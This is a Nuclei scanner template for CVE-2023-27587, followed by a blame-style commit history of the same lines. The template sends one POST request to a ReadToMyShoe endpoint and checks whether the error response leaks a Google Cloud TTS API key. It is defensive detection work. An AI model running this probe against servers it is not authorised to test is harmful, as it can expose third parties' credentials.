nuclei-templates/http/cves/2023/CVE-2023-27587.yaml

id: CVE-2023-27587

info:
  name: ReadToMyShoe - Generation of Error Message Containing Sensitive Information
  author: vagnerd
  severity: medium
  description: |
    ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.
  impact: |
    This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details.
  remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
    - https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
    - https://github.com/sec-fx/CVE-2023-27587-PoC
    - https://github.com/rozbb/readtomyshoe/commit/8533b01c818939a0fa919c7244d8dbf5daf032af
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27587
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-27587
    cwe-id: CWE-209
    epss-score: 0.21224
    epss-percentile: 0.95983
    cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: readtomyshoe_project
    product: readtomyshoe
  tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project

http:
  - raw:
      - |
        POST /api/add-article-by-text HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/json

        {
          "title":"Kernsicherheitstest",
          "body":"Kernsicherheitstest"
        }

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'

      - type: word
        words:
          - "Caused by:"
          - "TTS request failed"
        condition: and

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 500
# digest: 490a0046304402206fa7a9c5b7f4b6dc1d13ecb4e1db7a958e89ab261fc682ca1b17a2563843656e022024e109778953a0ada3c236a8f3e06fdd556426139e50fff6d81251b5b1dc7c08:922c64590222798bb761d5b6d8e72950
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`id: CVE-2023-27587`

			`info:`
Enhancement: cves/2023/CVE-2023-27587.yaml by md 2023-04-10 18:57:24 +00:00			`name: ReadToMyShoe - Generation of Error Message Containing Sensitive Information`
fix trailing-spaces 2023-03-21 20:25:10 +00:00			`author: vagnerd`
Auto Generated CVE annotations [Tue Mar 21 21:08:12 UTC 2023] :robot: 2023-03-21 21:08:12 +00:00			`severity: medium`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`description: \|`
Trailing space 2023-04-10 20:50:55 +00:00			`ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`reference:`
fix trailing-spaces 2023-03-21 20:25:10 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`- https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g`
			`- https://github.com/sec-fx/CVE-2023-27587-PoC`
Auto Generated CVE annotations [Tue Mar 21 21:08:12 UTC 2023] :robot: 2023-03-21 21:08:12 +00:00			`- https://github.com/rozbb/readtomyshoe/commit/8533b01c818939a0fa919c7244d8dbf5daf032af`
Enhancement: cves/2023/CVE-2023-27587.yaml by md 2023-04-10 18:57:24 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-27587`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`classification:`
Auto Generated CVE annotations [Tue Mar 21 21:08:12 UTC 2023] :robot: 2023-03-21 21:08:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 6.5`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`cve-id: CVE-2023-27587`
			`cwe-id: CWE-209`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.21224`
			`epss-percentile: 0.95983`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: readtomyshoe_project`
			`product: readtomyshoe`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`- raw:`
			`- \|`
			`POST /api/add-article-by-text HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Encoding: gzip, deflate`
fix trailing-spaces 2023-03-21 20:25:10 +00:00			`Content-Type: application/json`
Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00
			`{`
			`"title":"Kernsicherheitstest",`
			`"body":"Kernsicherheitstest"`
			`}`

			`matchers-condition: and`
			`matchers:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- type: dsl`
			`dsl:`
			`- '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'`

changes of @DhiyaneshGeek 2023-03-21 19:36:32 +00:00			`- type: word`
			`words:`
			`- "Caused by:"`
			`- "TTS request failed"`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "text/plain"`

Added CVE-2023-27587 template 2023-03-15 16:39:41 +00:00			`- type: status`
			`status:`
			`- 500`
Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot: 2024-01-14 14:05:19 +00:00			`# digest: 490a0046304402206fa7a9c5b7f4b6dc1d13ecb4e1db7a958e89ab261fc682ca1b17a2563843656e022024e109778953a0ada3c236a8f3e06fdd556426139e50fff6d81251b5b1dc7c08:922c64590222798bb761d5b6d8e72950`